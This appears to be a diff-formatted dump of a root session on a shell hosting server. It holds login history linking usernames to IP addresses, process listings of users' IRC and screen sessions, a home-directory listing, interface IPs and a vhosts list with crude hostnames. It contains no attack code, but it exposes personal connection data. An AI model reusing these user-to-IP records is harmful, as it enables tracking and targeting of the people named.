+katsst           ttyp2    76.240.177.107   Sat Jun  6 12:34 - 13:04  (00:30)
+sysc             ttyp2    66.197.170.181   Sat Jun  6 11:54 - 12:08  (00:14)
+yaquis           ttyp2    189.176.79.52    Sat Jun  6 11:38 - 11:45  (00:07)
+devil            ttyp6    190.42.90.138    Sat Jun  6 09:34 - 09:34  (00:00)
+cazz1961         ttyp2    90.205.23.123    Sat Jun  6 09:21 - 09:55  (00:33)
+howell1          ttyp2    93.97.125.103    Sat Jun  6 08:22 - 08:22  (00:00)
+asriel           ttyp2    66.197.170.181   Sat Jun  6 07:36 - 07:37  (00:00)
+sysc             ttyp2    66.197.170.181   Sat Jun  6 06:57 - 07:32  (00:35)
+yaquis           ttyp2    72.223.92.235    Sat Jun  6 01:18 - 01:44  (00:25)
+yaquis           ttyp2    189.176.79.52    Sat Jun  6 01:11 - 01:13  (00:02)
+blkgraz          ttyp8    71.252.210.34    Fri Jun  5 18:54 - 11:26 (2+16:31)
+katsst           ttyp6    76.240.177.107   Fri Jun  5 18:41 - 19:11  (00:30)
+smash            ttyp6    ntora.eml.ee     Fri Jun  5 18:07 - 18:07  (00:00)
+smash            ttyp8    ntora.eml.ee     Fri Jun  5 15:03 - 15:03  (00:00)
+chaos1           ttyp6    69.143.254.180   Fri Jun  5 15:02 - 15:52  (00:50)
+chaos1           ttyp8    69.143.254.180   Fri Jun  5 12:34 - 12:40  (00:06)
+smash            ttyp6    ntora.eml.ee     Fri Jun  5 12:18 - 13:09  (00:50)
+yaquis           ttyp6    72.223.92.235    Fri Jun  5 00:56 - 01:21  (00:24)
+smash            ttyp6    ntora.eml.ee     Fri Jun  5 00:13 - 00:21  (00:07)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:41 - 19:45  (00:03)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:36 - 19:41  (00:05)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:32 - 19:35  (00:03)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:27 - 19:31  (00:04)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:18 - 19:27  (00:09)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:13 - 19:17  (00:04)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 19:04 - 19:13  (00:08)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:57 - 19:04  (00:06)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:52 - 18:57  (00:04)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:41 - 18:52  (00:10)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:39 - 18:41  (00:02)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:28 - 18:39  (00:10)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:18 - 18:24  (00:06)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:14 - 18:18  (00:03)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 18:08 - 18:14  (00:06)
+katsst           ttyp8    76.240.177.107   Thu Jun  4 18:06 - 18:06  (00:00)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 17:55 - 18:08  (00:12)
+bollox           ftp      host81-129-70-1  Thu Jun  4 17:47 - 17:49  (00:01)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 17:44 - 17:55  (00:11)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 17:34 - 17:44  (00:10)
+katsst           ttyp6    76.240.177.107   Thu Jun  4 17:29 - 17:34  (00:04)
+smash            ttyp6    88.196.163.223   Thu Jun  4 16:39 - 17:06  (00:27)
+bollox           ttyp9    81.129.70.166    Thu Jun  4 16:12 - 16:44  (00:32)
+bollox           ftp      host81-129-70-1  Thu Jun  4 16:05 - 16:09  (00:04)
+chaos1           ttyp8    94.195.18.213    Thu Jun  4 15:50 - 16:23  (00:32)
+chaos1           ttyp6    67.86.132.29     Thu Jun  4 15:49 - 16:15  (00:26)
+chaos1           ttyp6    69.143.254.180   Wed Jun  3 23:06 - 23:52  (00:45)
+apo              ttyp8    75.158.79.102    Wed Jun  3 12:38 - 12:44  (00:05)
+apo              ttyp6    75.158.79.102    Wed Jun  3 12:20 - 12:54  (00:33)
+blkgraz          ttyp2    70.104.27.82     Wed Jun  3 12:01 - 19:16 (2+07:15)
+smash            ttyp2    ntora.eml.ee     Tue Jun  2 21:03 - 22:35  (01:32)
+kruapra          ttyp2    75.80.56.213     Tue Jun  2 20:05 - 20:35  (00:30)
+katsst           ttyp6    76.240.177.107   Tue Jun  2 14:30 - 15:00  (00:30)
+blkgraz          ttyp6    71.252.210.34    Tue Jun  2 10:39 - 11:36  (00:57)
+blkgraz          ttyp2    71.252.210.34    Tue Jun  2 09:51 - 18:17  (08:26)
+crrj13           ttyp2    24.23.247.110    Mon Jun  1 23:54 - 00:00  (00:06)
+crrj13           ttyp2    69.3.47.203      Mon Jun  1 23:19 - 23:32  (00:13)
+redrum           ttyp6    ist.kuscheli.ch  Mon Jun  1 13:49 - 14:11  (00:21)
+blkgraz          ttyp2    71.252.210.34    Mon Jun  1 12:26 - 23:19  (10:53)
+lordy            ttyp2    76.108.112.60    Mon Jun  1 06:20 - 06:21  (00:01)
+
+
+[root@velocity:~]# ps -aux | grep romeo
+root       83591  0.0  0.2  5400  2068  ??  Is    9:16AM   0:00.38 sshd: romeo [priv] (sshd)
+romeo      83595  0.0  0.2  5384  2120  ??  S     9:16AM   0:04.62 sshd:  (sshd)
+root       32336  0.0  0.1  1592   892  p2  S+    7:39PM   0:00.00 grep romeo
+romeo      20712  0.0  0.1  3272  1248  p9  Is   Wed06AM   0:00.13 /usr/local/bin/bash
+romeo      66004  0.0  0.7 10124  6844  p9  S+   Sat10AM   2:07.98 irssi -h absolute.ownage.net
+romeo      24414  0.0  0.1  2040  1444  pf  S+    4:23PM   0:00.04 screen -r
+romeo      83597  0.0  0.2  3240  1868  pf  Is    9:16AM   0:00.04 -bash (bash)
+[root@velocity:~]# 
+
+[root@velocity:~]# ps -aux | grep pimpinjg
+root       82323  0.0  0.2  5400  2120  ??  Is    8:47AM   0:00.07 sshd: pimpinjg [priv] (sshd)
+pimpinjg   82325  0.0  0.2  5384  2128  ??  I     8:47AM   0:00.35 sshd: pimpinjg@ttypd (sshd)
+root       32340  0.0  0.1  1548   880  p2  R+    7:39PM   0:00.00 grep pimpinjg
+pimpinjg   29257  0.0  0.1  2040  1444  pd  S+    6:20PM   0:00.03 screen -r
+pimpinjg   82327  0.0  0.2  3232  1844  pd  Is    8:47AM   0:00.03 -bash (bash)
+pimpinjg   20846  0.0  0.2  3268  1856  pe  Is    9:24PM   0:00.05 /usr/local/bin/bash
+pimpinjg   82595  0.0  0.7 10476  7720  pe  S+    8:52AM   0:16.87 irssi -h 72.20.28.206
+
+
+[root@velocity:/home]# ls -la
+total 820
+drwx--x--x  204 root         wheel        3584 Jun 17 18:30 ./
+drwxr-xr-x   24 root         wheel         512 Jun 15 07:35 ../
+drwxr-xr-x    4 ac1115       ac1115        512 Jul 10  2008 ac1115/
+drwxr-xr-x    4 burnt        burnt         512 Apr 22  2005 ad/
+drwxr-xr-x    3 nek0o        nek0o         512 Feb 26  2007 adro/
+drwxr-xr-x    3 alexbb       alexbb        512 Jun  8 23:27 alexbb/
+drwxr-xr-x    2 anux         anux          512 Feb 12  2008 anux/
+drwxr-xr-x    6 apo          apo           512 Sep 28  2008 apo/
+drwxr-xr-x    5 1162         1162          512 Mar  7  2007 arcade/
+drwxr-xr-x    2 asriel       asriel        512 Jun  6 07:37 asriel/
+drwxr-xr-x    6 athemp       athemp        512 Aug  6  2007 athemp/
+drwxr-xr-x    2 daali        daali         512 Mar  1  2005 badwolf/
+drwxr-xr-x    3 baxxta       baxxta        512 Jul 22  2008 baxxta/
+drwxr-xr-x    2 bbblade1     bbblade1      512 Jan 15  2008 bbblade1/
+drwxr-xr-x    7 1154         1154          512 Oct  9  2005 biffter/
+drwxr-xr-x    3 blake96      blake96       512 Dec  9  2008 blake96/
+drwxr-xr-x    2 1033         1033          512 Mar  1  2005 blazin/
+drwxr-xr-x    5 blkgraz      blkgraz       512 Mar 30 23:25 blkgraz/
+drwxr-xr-x    7 blotch       blotch        512 Dec 14  2008 blotch/
+drwxr-xr-x    9 bluewish     bluewish      512 Apr 13 10:40 bluewish/
+drwxr-xr-x    4 methanl      methanl       512 Apr 11  2007 blunted/
+drwxr-xr-x    2 bnoel        bnoel         512 Dec  5  2007 bnoel/
+drwxr-xr-x   14 bollox       bollox       1024 Feb 18  2008 bollox/
+drwxr-xr-x    4 1146         1146          512 Jul  6  2005 boxing/
+drwxr-xr-x    3 bpunux       bpunux        512 Oct 31  2008 bpunux/
+drwxr-xr-x    2 brex132      brex132       512 Jun  7 12:29 brex132/
+drwxr-xr-x    2 brosb4       brosb4        512 Nov 26  2008 brosb4/
+drwxr-xr-x    6 brosco       brosco        512 Mar 22 06:08 brosco/
+drwxr-xr-x    5 bruhaha      bruhaha       512 Aug 12  2008 bruhaha/
+drwxr-xr-x    5 1226         1226          512 Nov 23  2006 bubba01/
+drwxr-xr-x   13 burnt        burnt        1024 Mar 24  2008 burnt/
+drwxr-xr-x    4 1117         1117          512 Mar 18  2005 c00ps/
+drwxr-xr-x    3 1048         1048          512 Apr 20  2007 cake/
+drwxr-xr-x    5 cappy57      cappy57       512 Jul 13  2007 cappy57/
+drwxr-xr-x    4 cassand      cassand       512 Mar 19 14:35 cassand/
+drwxr-xr-x    5 cazz1961     cazz1961      512 Apr 14 17:23 cazz1961/
+drwxr-xr-x    6 ceejay       ceejay        512 Nov 23  2007 ceejay/
+drwxr-xr-x    8 chaos1       chaos1       1024 Feb  6 15:26 chaos1/
+drwxr-xr-x    6 1251         1251          512 Mar  9  2007 chatnet/
+drwxr-xr-x    6 comedy       comedy        512 Jan 20  2007 cheazey/
+drwxr-xr-x    5 chevym4n     chevym4n      512 Nov 23  2008 chevym4n/
+drwxr-xr-x    3 chozen1      chozen1       512 Jan 26 19:31 chozen1/
+drwxr-xr-x    5 chrirc       chrirc        512 Jun 12  2008 chrirc/
+drwxr-xr-x    2 chrisdad     chrisdad      512 Dec 18  2008 chrisdad/
+drwxr-xr-x    2 chriys       chriys        512 Dec  3  2008 chriys/
+drwxr-xr-x    7 1085         1085          512 Feb 11  2007 cloudy1/
+drwxr-xr-x    7 cmm          cmm          1024 May  9 07:01 cmm/
+drwxr-xr-x    2 comedy       comedy        512 May 22  2008 comedy/
+drwxr-xr-x    3 cont         cont          512 Jan 11 18:13 cont/
+drwxr-xr-x    2 coolcat      coolcat       512 Mar 18  2008 coolcat/
+drwxr-xr-x    2 corley       corley        512 May 12  2008 corley/
+drwx--x--x    9 cpu          cpu          1024 Apr 14 15:23 cpu/
+drwxr-xr-x   13 crash        crash        1024 Feb 19 20:40 crash/
+drwxr-xr-x    7 crazie       crazie        512 Nov 26  2007 crazie/
+drwxr-xr-x    8 crazyl       crazyl       1024 Apr 13  2007 crazyl/
+drwxr-xr-x   23 crrj13       crrj13       1536 Mar 23 17:27 crrj13/
+drwxr-xr-x    9 1159         1159          512 Sep  5  2005 d3vil/
+drwxrwxrwx    8 daali        daali         512 Mar 11  2008 daali/
+drwxr-xr-x    7 dano30       dano30        512 Apr 12  2007 dano30/
+drwxr-xr-x    4 darien9      darien9      1536 Oct 31  2008 darien9/
+drwxr-xr-x    7 dark         dark          512 Sep  3  2007 dark/
+drwxr-xr-x    6 darkevil     darkevil      512 Mar 25  2008 darkevil/
+drwxr-xr-x    5 darkuno3     darkuno3      512 Mar 10 10:27 darkuno3/
+drwxr-xr-x    2 dasboot      dasboot       512 Mar 13 13:55 dasboot/
+drwx------   11 1093         1093          512 Feb  5  2006 dave/
+drwxr-xr-x    7 dealer       dealer        512 Feb 25 01:01 dealer/
+drwxr-xr-x    6 1123         1123          512 Mar  1  2007 deathbal/
+drwxr-xr-x    2 delion1      delion1       512 Feb 22 16:51 delion1/
+drwxr-xr-x    3 cazz1961     cazz1961      512 Mar  1  2005 denial/
+drwxr-xr-x    5 devil        devil         512 May 22 10:21 devil/
+drwxr-xr-x    3 sqd          sqd           512 Dec  4  2006 digital/
+drwxr-xr-x    8 digitalman   digitalman    512 May 20 14:26 digitalman/
+drwxr-xr-x    5 1176         1176          512 Jan 16  2007 dizzle/
+drwxr-xr-x    3 djkarl       djkarl        512 Jan 10 12:23 djkarl/
+drwxr-xr-x    2 djspark      djspark       512 Jun 24  2008 djspark/
+drwxr-xr-x    7 chrirc       chrirc        512 Jan  6  2007 doomed/
+drwxr-xr-x    8 dravas       dravas       1024 Sep 29  2007 dravas/
+drwxr-xr-x    2 dv327        dv327         512 Apr  8  2007 drk9/
+drwxr-xr-x    5 1259         1259          512 Apr 11  2007 dust/
+drwxr-xr-x    3 dv327        dv327         512 Aug  9  2008 dv327/
+drwxr-xr-x    8 edgein       edgein        512 Feb 13  2008 edgein/
+drwxr-xr-x    8 en0prcv      en0prcv       512 Apr 14  2007 en0prcv/
+drwxr-xr-x    4 evino        evino         512 Jan 18  2006 evino/
+drwxr-xr-x    7 blkgraz      blkgraz       512 Mar  1  2005 evino2k5/
+drwxr-xr-x    4 root         wheel         512 Apr 12  2007 execute/
+drwxr-xr-x    3 f3d0r        f3d0r         512 Jul 31  2007 f3d0r/
+drwxr-xr-x    2 feed         feed          512 Aug 21  2008 feed/
+drwxr-xr-x    4 genosyde     genosyde      512 Jan 27 18:18 genosyde/
+drwxr-xr-x    2 grindey      grindey       512 Mar 25  2008 grindey/
+drwxr-xr-x    2 groove       groove        512 Apr 12  2007 groove/
+drwxr-xr-x    5 grumpy       grumpy        512 Feb  4 18:06 grumpy/
+drwxr-xr-x    4 hh360        hh360         512 May 19  2008 hh360/
+drwxr-xr-x    2 hixk         hixk          512 Nov 24  2008 hixk/
+drwxr-xr-x    3 howell1      howell1       512 May 29 20:39 howell1/
+drwxr-xr-x   12 hts          hts          1024 Jun 20 20:58 hts/
+drwxr-xr-x    2 hw4tbnc      hw4tbnc       512 May 11  2008 hw4tbnc/
+drwxr-xr-x    4 ioplex       ioplex        512 May  8 20:16 ioplex/
+drwxr-xr-x    6 ircjaymz     ircjaymz      512 Mar 18  2008 ircjaymz/
+drwxr-xr-x    2 ircusr       ircusr        512 Jan 20 17:49 ircusr/
+drwxr-xr-x    2 itzkorn      itzkorn       512 Apr 12  2007 itzkorn/
+drwxr-xr-x    2 izedd        izedd         512 Oct  9  2007 izedd/
+drwxr-xr-x    2 jaiven       jaiven        512 Feb 16 17:08 jaiven/
+drwxr-xr-x    4 jamesn       jamesn        512 May 31  2007 jamesn/
+drwxr-xr-x    8 jax66        jax66        1024 May 14 16:03 jax66/
+drwxr-xr-x    2 jerryste     jerryste      512 Dec 28 14:19 jerryste/
+-rw-r--r--    1 root         wheel           0 Oct  5  2007 jj.log
+drwxr-xr-x    2 jschultk     jschultk      512 May 31  2007 jschultk/
+drwxr-xr-x    2 jtracy       jtracy        512 Dec  3  2008 jtracy/
+drwxr-xr-x    2 katsst       katsst        512 Apr 12  2007 katsst/
+drwxr-xr-x   15 khicks       khicks       1024 Jan  2  2008 khicks/
+drwxr-xr-x    2 kingzy       kingzy        512 Feb 22 16:50 kingzy/
+drwxr-xr-x    4 kokoryu      kokoryu       512 Feb  1 16:54 kokoryu/
+drwxr-xr-x    2 kooner       kooner        512 Mar 24 17:34 kooner/
+drwxr-xr-x    2 kruapra      kruapra       512 Jan  1  2008 kruapra/
+drwxr-xr-x    2 ksafusi      ksafusi       512 Jan 29  2008 ksafusi/
+drwxr-xr-x    2 l33t         l33t          512 Apr 12  2007 l33t/
+drwxr-xr-x    2 lailoke      lailoke       512 Mar 11 22:12 lailoke/
+drwxr-xr-x    9 lordy        lordy         512 May 17 04:05 lordy/
+drwxr-xr-x    8 ltootle      ltootle       512 Jun 10  2008 ltootle/
+drwxr-xr-x   15 lyhne1       lyhne1       1024 May 25 23:00 lyhne1/
+drwxr-xr-x    6 lymelyte     lymelyte      512 Mar 29 14:18 lymelyte/
+drwxr-xr-x    3 lynx         lynx          512 May 28  2008 lynx/
+drwxr-xr-x    2 mae21        mae21         512 Mar  8 21:02 mae21/
+drwxr-xr-x    5 manboo       manboo        512 Jul  7  2008 manboo/
+drwxr-xr-x    3 matt         matt          512 Jun 20 19:25 matt/
+drwxr-xr-x    2 methanl      methanl       512 Feb  5  2008 methanl/
+drwxr-xr-x    6 mimik0r      mimik0r       512 May 20  2008 mimik0r/
+drwxr-xr-x    2 mindben      mindben       512 Nov 24  2008 mindben/
+drwxr-xr-x    7 mlh          mlh           512 Apr  8 01:12 mlh/
+drwxr-xr-x    3 mogle3       mogle3        512 Apr  8 12:06 mogle3/
+drwxr-xr-x    3 mooo         mooo          512 May 21 20:50 mooo/
+drwxr-xr-x    5 mrts         mrts          512 Mar 18 01:51 mrts/
+drwxr-xr-x    9 narcissu     narcissu      512 Feb  2  2008 narcissu/
+drwxr-xr-x    7 nardi        nardi         512 Mar 24 10:55 nardi/
+drwxr-xr-x    3 nek0o        nek0o         512 Jul 21  2008 nek0o/
+drwxr-xr-x    3 neohax       neohax        512 Jun 13  2007 neohax/
+drwxr-xr-x    3 nexxtea      nexxtea       512 Apr 19  2007 nexxtea/
+drwxr-xr-x    9 nodex        nodex         512 Sep  5  2007 nodex/
+drwxr-xr-x    2 nsc          wheel         512 Apr 12  2007 nsc/
+drwxr-xr-x    3 nyakz        nyakz         512 Mar 13 20:13 nyakz/
+drwxr-xr-x    9 oby1         oby1          512 Feb 13  2008 oby1/
+drwxr-xr-x   21 omelette     omelette     1024 Jun  1  2008 omelette/
+drwxr-xr-x    2 omen         omen          512 Nov 24  2008 omen/
+drwxr-xr-x    5 omgwtf       omgwtf        512 Apr 27 03:17 omgwtf/
+drwxr-xr-x    5 owine        owine         512 Apr 21  2008 owine/
+drwxr-xr-x    6 own3d        own3d         512 Oct 15  2008 own3d/
+drwxr-xr-x    5 paleride     paleride      512 Jan 27 17:55 paleride/
+drwxr-xr-x    2 pbx          pbx           512 Dec 28 14:22 pbx/
+drwxr-xr-x    2 percott1     percott1      512 Jun 24  2008 percott1/
+drwxr-xr-x    8 pimpinjg     pimpinjg      512 Jun 23 07:20 pimpinjg/
+drwxr-xr-x    4 poolboy      poolboy       512 Aug 29  2007 poolboy/
+drwxr-xr-x    3 prodigy      prodigy       512 May 30  2008 prodigy/
+drwxr-xr-x    3 psycoz       psycoz        512 Jun  7 17:01 psycoz/
+drwxr-xr-x    2 qberto       qberto        512 Mar 17 12:09 qberto/
+drwxr-xr-x    7 qfx          qfx           512 Feb 17 04:54 qfx/
+drwxr-xr-x    4 quinn        quinn         512 Aug 10  2007 quinn/
+drwxr-xr-x    5 reaper90     reaper90      512 Dec  2  2007 reaper90/
+drwxr-xr-x   22 redrum       redrum       1024 Jun  9 12:49 redrum/
+drwxr-xr-x    5 reznik       reznik        512 Apr 11  2008 reznik/
+drwxr-xr-x    4 rice21       rice21        512 Dec 17  2008 rice21/
+drwxr-xr-x    4 rikt         rikt          512 Feb 17 06:27 rikt/
+drwxr-xr-x    5 romeo        romeo         512 Jun 20 02:58 romeo/ 
+drwxr-xr-x    7 roodyk       roodyk        512 Apr 26 14:04 roodyk/
+drwxr-xr-x    3 sacred       sacred        512 Jun  1  2007 sacred/
+drwxr-xr-x    3 safety       safety        512 Feb 15  2008 safety/
+drwxr-xr-x    2 sakik1       sakik1        512 Dec  3  2008 sakik1/
+drwxr-xr-x    2 sal          sal           512 Feb 16 17:17 sal/
+drwxr-xr-x    5 schlomer     schlomer      512 Aug 24  2007 schlomer/
+drwxr-xr-x    7 scouse       scouse       1536 Nov  5  2008 scouse/
+drwxr-xr-x    5 sharpie      sharpie       512 Apr 13  2007 sharpie/
+drwxr-xr-x    5 shoes        shoes         512 Mar  7 22:32 shoes/
+drwxr-xr-x    2 silver15     silver15      512 Mar 25  2008 silver15/
+drwxr-xr-x    3 simonbh      simonbh       512 Aug  9  2007 simonbh/
+drwxr-xr-x    9 sinistro     sinistro      512 Oct  5  2007 sinistro/
+drwxr-xr-x    2 skit         skit          512 Apr 12  2007 skit/
+drwxr-xr-x    6 skypilot     skypilot      512 Nov  7  2008 skypilot/
+drwxr-xr-x    5 smash        smash         512 Jun 22 01:29 smash/
+drwxr-xr-x    6 sqd          sqd           512 May  7 20:56 sqd/
+drwxr-xr-x    3 ssaws        ssaws         512 Feb  3 23:20 ssaws/
+drwxr-xr-x    4 ste          ste           512 Jun 15 12:29 ste/
+drwxr-xr-x    5 subkult      subkult       512 Feb  3 11:59 subkult/
+drwxr-xr-x    7 sysc         sysc          512 Jun 11 10:27 sysc/
+drwxr-xr-x    9 tarawa       tarawa        512 May 26 10:51 tarawa/
+drwxr-xr-x    3 tea          tea           512 Mar 16  2008 tea/
+drwxr-xr-x    5 techi3       techi3        512 Aug 29  2007 techi3/
+drwxr-xr-x    5 timgor       timgor       1024 Sep  3  2007 timgor/
+drwxr-xr-x    3 tlm          tlm           512 May  1  2007 tlm/
+drwxr-xr-x    7 vamp         vamp         1024 Nov 20  2007 vamp/
+drwxr-xr-x    2 vietnigh     vietnigh      512 Mar  8 15:31 vietnigh/
+drwxr-xr-x    3 visage       visage        512 Mar 13 15:59 visage/
+drwxr-xr-x    4 vitalrbj     vitalrbj      512 May 15  2007 vitalrbj/
+drwxr-xr-x    3 vividbreeze  vividbreeze   512 May 15  2005 vividbreeze/
+drwxr-xr-x    2 voxitize     voxitize      512 Aug 18  2008 voxitize/
+drwxr-xr-x    5 warlordz     warlordz      512 Aug 20  2007 warlordz/
+drwxr-xr-x    3 wchan21      wchan21       512 Dec 15  2008 wchan21/
+drwxr-xr-x    4 wolf         wolf          512 Aug 28  2008 wolf/
+drwxr-xr-x    2 xavi         xavi          512 Feb  1 16:56 xavi/
+drwxr-xr-x    3 xckx         xckx          512 Oct  4  2007 xckx/
+drwxr-xr-x    4 xkelsx       xkelsx        512 Dec 16  2008 xkelsx/
+drwxr-xr-x    5 y2j          y2j           512 May 15 08:42 y2j/
+drwxr-xr-x   13 yaquis       yaquis       1024 Jun 11 14:32 yaquis/
+drwxr-xr-x    8 zeepysea     zeepysea      512 Oct 21  2008 zeepysea/
+drwxr-xr-x    6 zenchi       zenchi        512 Nov 29  2007 zenchi/
+drwxr-xr-x    4 zime         zime          512 Feb 15  2008 zime/
+drwxr-xr-x    3 zoo          zoo           512 Apr 14  2007 zoo/
+[root@velocity:/home]# 
+
+
+[root@velocity:/home]# ifconfig
+bge0: flags=8843 mtu 1500
+        options=1b
+        inet 72.20.3.98 netmask 0xfffffffc broadcast 72.20.3.99
+        inet 72.20.28.193 netmask 0xffffffff broadcast 72.20.28.193
+        inet 72.20.28.194 netmask 0xffffffff broadcast 72.20.28.194
+        inet 72.20.28.195 netmask 0xffffffff broadcast 72.20.28.195
+        inet 72.20.28.196 netmask 0xffffffff broadcast 72.20.28.196
+        inet 72.20.28.197 netmask 0xffffffff broadcast 72.20.28.197
+        inet 72.20.28.198 netmask 0xffffffff broadcast 72.20.28.198
+        inet 72.20.28.199 netmask 0xffffffff broadcast 72.20.28.199
+        inet 72.20.28.200 netmask 0xffffffff broadcast 72.20.28.200
+        inet 72.20.28.201 netmask 0xffffffff broadcast 72.20.28.201
+        inet 72.20.28.202 netmask 0xffffffff broadcast 72.20.28.202
+        inet 72.20.28.203 netmask 0xffffffff broadcast 72.20.28.203
+        inet 72.20.28.204 netmask 0xffffffff broadcast 72.20.28.204
+        inet 72.20.28.205 netmask 0xffffffff broadcast 72.20.28.205
+        inet 72.20.28.206 netmask 0xffffffff broadcast 72.20.28.206
+        inet 72.20.28.207 netmask 0xffffffff broadcast 72.20.28.207
+        inet 72.20.28.208 netmask 0xffffffff broadcast 72.20.28.208
+        inet 72.20.28.209 netmask 0xffffffff broadcast 72.20.28.209
+        inet 72.20.28.210 netmask 0xffffffff broadcast 72.20.28.210
+        inet 72.20.28.211 netmask 0xffffffff broadcast 72.20.28.211
+        inet 72.20.28.212 netmask 0xffffffff broadcast 72.20.28.212
+        inet 72.20.28.213 netmask 0xffffffff broadcast 72.20.28.213
+        inet 72.20.28.214 netmask 0xffffffff broadcast 72.20.28.214
+        inet 72.20.28.215 netmask 0xffffffff broadcast 72.20.28.215
+        inet 72.20.28.216 netmask 0xffffffff broadcast 72.20.28.216
+        inet 72.20.28.217 netmask 0xffffffff broadcast 72.20.28.217
+        inet 72.20.28.218 netmask 0xffffffff broadcast 72.20.28.218
+        inet 72.20.28.219 netmask 0xffffffff broadcast 72.20.28.219
+        inet 72.20.28.220 netmask 0xffffffff broadcast 72.20.28.220
+        inet 72.20.28.221 netmask 0xffffffff broadcast 72.20.28.221
+        inet 72.20.28.222 netmask 0xffffffff broadcast 72.20.28.222
+        inet 72.20.28.223 netmask 0xffffffff broadcast 72.20.28.223
+        inet 72.20.28.224 netmask 0xffffffff broadcast 72.20.28.224
+        inet 72.20.28.225 netmask 0xffffffff broadcast 72.20.28.225
+        inet 72.20.28.226 netmask 0xffffffff broadcast 72.20.28.226
+        inet 72.20.28.227 netmask 0xffffffff broadcast 72.20.28.227
+        inet 72.20.28.228 netmask 0xffffffff broadcast 72.20.28.228
+        inet 72.20.28.229 netmask 0xffffffff broadcast 72.20.28.229
+        inet 72.20.28.230 netmask 0xffffffff broadcast 72.20.28.230
+        inet 72.20.28.231 netmask 0xffffffff broadcast 72.20.28.231
+        inet 72.20.28.232 netmask 0xffffffff broadcast 72.20.28.232
+        inet 72.20.28.233 netmask 0xffffffff broadcast 72.20.28.233
+        inet 72.20.28.234 netmask 0xffffffff broadcast 72.20.28.234
+        inet 72.20.28.235 netmask 0xffffffff broadcast 72.20.28.235
+        inet 72.20.28.236 netmask 0xffffffff broadcast 72.20.28.236
+        inet 72.20.28.237 netmask 0xffffffff broadcast 72.20.28.237
+        inet 72.20.28.238 netmask 0xffffffff broadcast 72.20.28.238
+        inet 72.20.28.239 netmask 0xffffffff broadcast 72.20.28.239
+        inet 72.20.28.240 netmask 0xffffffff broadcast 72.20.28.240
+        inet 72.20.28.241 netmask 0xffffffff broadcast 72.20.28.241
+        inet 72.20.28.242 netmask 0xffffffff broadcast 72.20.28.242
+        inet 72.20.28.243 netmask 0xffffffff broadcast 72.20.28.243
+        inet 72.20.28.244 netmask 0xffffffff broadcast 72.20.28.244
+        inet 72.20.28.245 netmask 0xffffffff broadcast 72.20.28.245
+        inet 72.20.28.246 netmask 0xffffffff broadcast 72.20.28.246
+        inet 72.20.28.247 netmask 0xffffffff broadcast 72.20.28.247
+        inet 72.20.28.248 netmask 0xffffffff broadcast 72.20.28.248
+        inet 72.20.28.249 netmask 0xffffffff broadcast 72.20.28.249
+        inet 72.20.28.250 netmask 0xffffffff broadcast 72.20.28.250
+        inet 72.20.28.251 netmask 0xffffffff broadcast 72.20.28.251
+        inet 72.20.28.252 netmask 0xffffffff broadcast 72.20.28.252
+        inet 72.20.28.253 netmask 0xffffffff broadcast 72.20.28.253
+        inet 72.20.28.254 netmask 0xffffffff broadcast 72.20.28.254
+        ether 00:11:11:cc:09:63
+        media: Ethernet 10baseT/UTP 
+        status: active
+lo0: flags=8049 mtu 16384
+        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 
+        inet6 ::1 prefixlen 128 
+        inet 127.0.0.1 netmask 0xff000000 
+[root@velocity:/home]# 
+
+
+[root@velocity:/usr/home]# cat /bin/vhosts 
+#!/usr/local/bin/bash
+echo "
+
+          _   __/ /_  ____  _____/ /______
+         | | / / __ \/ __ \/ ___/ __/ ___/
+         | |/ / / / / /_/ (__  ) /_(__  )
+         |___/_/ /_/\____/____/\__/____/
+           www.vitalspeeds.com/vhosts
+
+72.20.3.98 -\> .
+72.20.28.193 -\> scaring.us.
+72.20.28.194 -\> .
+72.20.28.195 -\> George.W.Bush.is.scaring.us.
+72.20.28.196 -\> l33t.hax0rs.are.scaring.us.
+72.20.28.197 -\> your.mom.is.scaring.us.
+72.20.28.198 -\> irc.isidling.net.
+72.20.28.199 -\> everyone.isalways.idling.net.
+72.20.28.200 -\> just.idling.net.
+72.20.28.201 -\> the.mpaa.keeps.scaring.us.
+72.20.28.202 -\> the.riaa.keeps.scaring.us.
+72.20.28.203 -\> defaultxbe.com.
+72.20.28.204 -\> ownage.net.
+72.20.28.205 -\> absolute.ownage.net.
+72.20.28.206 -\> complete.ownage.net.
+72.20.28.207 -\> is.the.godofgods.net.
+72.20.28.208 -\> fatblunts.com.
+72.20.28.209 -\> will.work.for.fatblunts.com.
+72.20.28.210 -\> smokes.fatblunts.com.
+72.20.28.211 -\> rolls.fatblunts.com.
+72.20.28.212 -\> fuckdapolice.com.
+72.20.28.213 -\> killed.my.wife.and.said.fuckdapolice.com.
+72.20.28.214 -\> owned.nasa.and.said.fuckdapolice.com.
+72.20.28.215 -\> playah.org.
+72.20.28.216 -\> big.time.playah.org.
+72.20.28.217 -\> still.a.playah.org.
+72.20.28.218 -\> the.original.playah.org.
+72.20.28.219 -\> shitsngiggles.net.
+72.20.28.220 -\> packeted.gov.for.shitsngiggles.net.
+72.20.28.221 -\> us-govt.info.
+72.20.28.222 -\> has.topsecret.us-govt.info.
+72.20.28.223 -\> steals.us-govt.info.
+72.20.28.224 -\> packets.the.us-govt.info.
+72.20.28.225 -\> oblivion.globalwar.net.
+72.20.28.226 -\> started.a.globalwar.net.
+72.20.28.227 -\> irc.sith-net.com.
+72.20.28.228 -\> i.am.away.idling.net.
+72.20.28.229 -\> you.got.schooled.org.
+72.20.28.230 -\> wonders.why.arabs.like.to.fuck.withthe.us.
+72.20.28.231 -\> dont.fuck.withthe.us.
+72.20.28.232 -\> stole.your-ip.info.
+72.20.28.233 -\> has.your-ip.info.
+72.20.28.234 -\> overflo.ws.
